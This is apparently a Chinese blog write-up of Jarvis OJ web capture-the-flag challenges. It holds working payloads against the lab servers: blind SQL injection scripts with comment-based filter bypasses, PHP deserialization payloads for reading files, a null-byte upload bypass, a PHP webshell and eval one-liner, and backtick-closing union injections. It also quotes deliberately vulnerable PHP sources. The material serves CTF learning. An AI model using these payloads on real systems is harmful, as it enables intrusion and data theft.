jarvis oj(web wp)

api调用

这题是slim架构的xxe漏洞,看博客做题2333

https://www.leavesongs.com/PENETRATION/slim3-xxe.html

simple injection

username和password是注入点,然后就是确认怎么注入了

题目是过滤了空格的,但是可以用/**/绕过

确认存在admin表

username=admin'/**/or/**/exists(select/**/*/**/from/**/admin)#&password=1'#

存在username和password字段

username=admin'/**/or/**/exists(select/**/username,password/**/from/**/admin)#&password=1'#

确定只有一条记录

username=admin'/**/or/**/exists(select/**/count(*)/**/from/**/admin)#&password=1'#

确定密码长度

username=user'/**/or/**/(select/**/length(password)/**/from/**/admin)=32#&password=1'#

剩下的就是盲注了,贴个脚本

#coding:utf-8
import requests
url = "http://web.jarvisoj.com:32787/login.php"
str = "密码错误"
chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
print('start!')
password = ""
for i in range(1,33):
    for j in chars:
        data = {'username':"user'/**/or/**/mid((select/**/password/**/from/**/admin),%s,1)='%s'#"%(i,j),'password':"1'#"}
        res = requests.post(url,data=data).text
        if str in res:
            password += j
            print(password)
            break
print(password)
print('end!')

结果

这个明显是md5加密后的,去解密然后再明文登录就行了

WEB?

这题看前端的js代码可以看到验证规则

$.post("checkpass.json",t,
	function(t){
		self.checkpass(e)?
		self.setState({
			errmsg:"Success!!",
			errcolor:b.green400
		}):(self.setState({
			errmsg:"Wrong Password!!",
			errcolor:b.red400
		})
	})

然后他的checkpass函数是这样的

function(e){
	if(25!==e.length)
		return !1;
	for(var t=[],n=0;n<25;n++)
		t.push(e.charCodeAt(n));
	for(var r=[325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259],o=[[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]],n=0;n<25;n++){
		for(var i=0,a=0;a<25;a++)
			i+=t[a]*o[n][a];
			if(i!==r[n])
				return !1
	}
	return!0}
}

就是要解一个25元的方程组,用脚本帮忙算

import np
r=[325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259]
o=[[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]]
o = np.array(o)
r = np.array(r)
x = np.linalg.solve(o,r)
# print(x)
string = ''
for i in x:
    i += 0.5
    # print(round(i,0))
    string += chr(int(i))
print(string)

这里我是将最后算出来的值对应成ascii码转出来就能得到flag了

神盾局的秘密

这题进去会看见一个图片,然后也会发现url的参数是一个base64,解密出来是shield.jpg

猜测是文件读取

试下index.php进行base64加密然后传过去,可以看到index.php的代码

同理,其他的代码也可以顺着找过去

index.php
<?php 
	require_once('shield.php');
	$x = new Shield();
	isset($_GET['class']) && $g = $_GET['class'];
	if (!empty($g)) {
		$x = unserialize($g);
	}
	echo $x->readfile();
?>
//对得到的值进行反序列化


shield.php
<?php
	//flag is in pctf.php
	class Shield {
		public $file;
		function __construct($filename = '') {
			$this -> file = $filename;
		}
		
		function readfile() {
			if (!empty($this->file) && stripos($this->file,'..')===FALSE  
			&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
				return @file_get_contents($this->file);
			}
		}
	}
?>
//过滤..  /  \\
//将读出来的文件内容放进一个变量


showimg.php
<?php
	$f = $_GET['img'];
	if (!empty($f)) {
		$f = base64_decode($f);
		if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
		&& stripos($f,'pctf')===FALSE) {
			readfile($f);
		} else {
			echo "File not found!";
		}
	}
?>
//过滤..  /  \\  pctf

可以看到,index.php接了一个class对他进行反序列化然后调用readfile函数并输出值,flag在pctf.php里面,直接从showimg.php去读pctf.php是不可能的了,只能序列化去index.php里去读

最终payload

http://web.jarvisoj.com:32768/index.php?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}

flag在管理员手里

这题是考哈希长度扩展攻击,哈希长度扩展攻击就不解释了,直接做题,抓包看到role和hsh

再扫一下后台,看到index.php~泄露,恢复文件可以看到

role是cookie传过来的值,hsh是md5加密salt和反转的role后的值,如果role是admin的话,就可以拿到flag

但是salt是什么我们不知道,可是可以用hashpump求出来

这里有篇p神的博客可以参考,写的很详细

https://www.cnblogs.com/pcat/p/5478509.html

得出来的结果也都有了,把md5下面的字符串倒回去改成url加密就行了

in a mess

题目提示看index.phps

<?php

error_reporting(0);
echo "<!--index.phps-->";

if(!$_GET['id'])
{
	header('Location: index.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'Hahahahahaha';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	require("flag.txt");
}
else
{
	print "work harder!harder!harder!";
}


?>

看到我们要输入id,a,b三个值,而且还要满足id=0,a读文件读出来是1122 is a nice lab!,b长度大于5且与1144匹配但是第一位不是4

id输入字符串就能绕过,比如id=0e12,id=abd

a的话,用到了php://input(据说data协议也可以,a=data:,1122 is a nice lab!

b的话,用%00截断,b=%00111111

然后就看到这个,这里开始要进行sql注入,过滤了空格,union,select,from,表名

从图中可以看见有3列,而且一开始尝试id=1'时报错直接报了数据表是content

所以就直接看字段是什么了

然后看context的值

RE?

这题我贼懵圈,udf提权?喵喵喵?

拿到一个udf文件,把他放进去服务器,然后就看help_me函数

Easy Gallery

这题点进去看见一个文件上传的地方,应该就是考文件上传了

然后试了下%00和绕过,都不能上传php文件,猜测应该是图片马

试下在图片后面加<?php phpinfo();?>然后上传再去访问

(这里有个坑,真正能访问到图片的地址是http://web.jarvisoj.com:32785/index.php?page=uploads/图片id+图片类型

结果出现这个,所以后台是在文件末尾自动加上.php然后就去访问,所以就要用到%00截断

截断以后发现

试了一下发现好像是检测到<?就会触发waf,所以改一下传法

<script language='php'>

phpinfo();

</script>

上传再去访问就能看见了

Chopper

这题服务器应该是挂了,一直访问不了

记录一下别人的做题思路和考点

这题应该是在考代理,点进去看见有张图片和管理员登录,然后点进去看见要用管理员IP103.27.76.153才允许登录

试了下抓包改包什么的都不行

最后发现是代理(还是跨站攻击?

通过原来的网站去访问一个中间的网站,然后中间的网站有比较高的权限,就可以访问其他的原本禁止访问的网站了

http://web.jarvisoj.com:32782/proxy.php?url=http://103.27.76.153/proxy.php?url=http://web.jarvisoj.com:32782/admin/

然后能看到一个you are closing的网页........

扫后台能看到有robot.txt,里面有两个disallow,一个是trojan.php,一个trojan.php.txt

在txt里能看见有一句话木马 "eval($_POST[360])" 

最后菜刀连一下就能拿到flag了

phpinfo

这里参考大佬博客https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/

这题进去能看见源码

这题考到的是反序列化的漏洞,emmm,题目提示很明显

有个OowoO的类,一个可控变量mdzz,两个魔幻函数,很友好,但是怎么才能控制这个类呢

看下phpinfo

session.upload_progress.enabled是on,当一个上传在处理时,post一个与ini中设置的session.upload_progress.name同名变量时,PHP检测到这个post请求,就会在$_SESSION中添加一组数据,所以可以通过session upload progress设置session,然后控制OowoO这个类达到我们的目的

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>phpinfo</title>
</head>
<body>
    <form action="http://web.jarvisoj.com:32784/index.php" method="post" enctype="multipart/form-data">
        <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
        <input type="file" name="file" />
        <input type="submit" value="go" />
    </form>
</body>
</html>

通过这个网页去抓包改包达到我们的目的,对序列化出来的语句不熟的话可以直接写个脚本echo出来,这里就不贴了(逃

先看当前文件路径,抓包把filename改成|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(dirname(/opt/lampp/htdocs));\";}

加个反斜杠是为了防转义

得到结果

然后扫描目录,filename为|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"print_r(scandir(\"/opt/lampp/htdocs\"));\";}

可以看到有flag的文件了

最后把他读出来,filename为|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

flag

inject

这题首先进去第一件事是要找到源码orz

这里是index.php~泄露

<?php
	require("config.php");
	$table = $_GET['table']?$_GET['table']:"test";
	$table = Filter($table);
	mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
	$sql = "select 'flag{xxx}' from secret_{$table}";
	$ret = sql_query($sql);
	echo $ret[0];
?>

可以看到$table是可以注入的一个点

因为他是反引号括着,所以我们要想办法闭合反引号

查看数据库

?table=test` `union select database() limit 1,1

看表

?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1

接着是字段,这里有个坑就是后台过滤了双引号,然后就只能一行一行慢慢看

?table=test`  `union select column_name from information_schema.columns  limit 1,1

最后就能拿到flag了

?table=test`  `union select group_concat(flagUwillNeverKnow) from secret_flag  limit 1,1

babyphp

这题看到题目有说用到了git,猜测是.git泄露,一扫还真的是

然后就看到了源码

<?php
if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>

这里可以看到源码有个assert函数,这个函数可以将接收到的字符串当做代码执行,而且刚好又有一个$file参数,所以就可以进行代码执行,用下系统函数先去查看目录

看见有个templates目录,其实这个在泄露出来的源码就看到了,继续看templates目录

看到有个flag.php,读取一下

flag已经出来了

register

这题给了提示,但是一直找不到country会影响什么,最后看大佬博客做题2333

https://blog.csdn.net/Ni9htMar3/article/details/73743284#t4

http://mitah.cn/index.php/archives/8/

country会影响时间,然后就是利用时间的不同进行布尔盲注

最后拿到admin的密码进行碰撞登录进去manage页面就能看见flag了

图片上传漏洞

这题考CVE漏洞,太菜了,还是不会,看大佬wp做题

https://www.scanfsec.com/jarvisoj_web_writeup.html#directory056831405803208134

https://www.2cto.com/article/201605/505823.html

看phpinfo能看到有ImageMagick,剩下的就是漏洞利用了

利用exiftool生成一句话木马

然后就是上传了

剩下的就是访问y.php连菜刀了,但是后台好像挂了???一直找不到y.php

babyxss

这题还没弄懂,先把大佬的wp挂一挂,以后弄懂他(ง •̀_•́)ง

https://blog.csdn.net/littlelittlebai/article/details/78922343

https://blog.csdn.net/Ni9htMar3/article/details/73743284#t4

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值